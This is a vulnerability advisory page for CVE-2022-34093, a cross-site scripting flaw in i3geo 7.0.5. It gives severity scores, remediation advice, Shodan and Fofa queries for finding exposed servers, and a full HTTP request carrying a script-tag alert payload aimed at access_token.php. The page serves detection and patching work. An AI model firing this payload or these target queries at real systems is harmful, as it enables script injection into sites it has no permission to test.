🔙 목록으로 돌아가기

CVE-2022-34093: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting

TitleSoftware Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactAttackers can inject malicious JavaScript through parameters in the LinkedIn OAuth access_token.php endpoint that executes in users' browsers, potentially stealing session tokens or performing unauthorized actions in the i3geo geographic information system.
RemediationUpdate i3geo to a version later than 7.0.5 that properly sanitizes and encodes user input in access_token.php.
CVSS Score6.1
EPSS Score0.05106
CVE IDCVE-2022-34093
CWE IDCWE-79
Shodan Queryhttp.html:"i3geo"
Fofa Querybody="i3geo"
Tags cve cve2022 i3geo xss softwarepublico vuln

🔍 Vulnerability Description

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.

🌐 HTTP Request

GET /i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-34093.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-34093.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A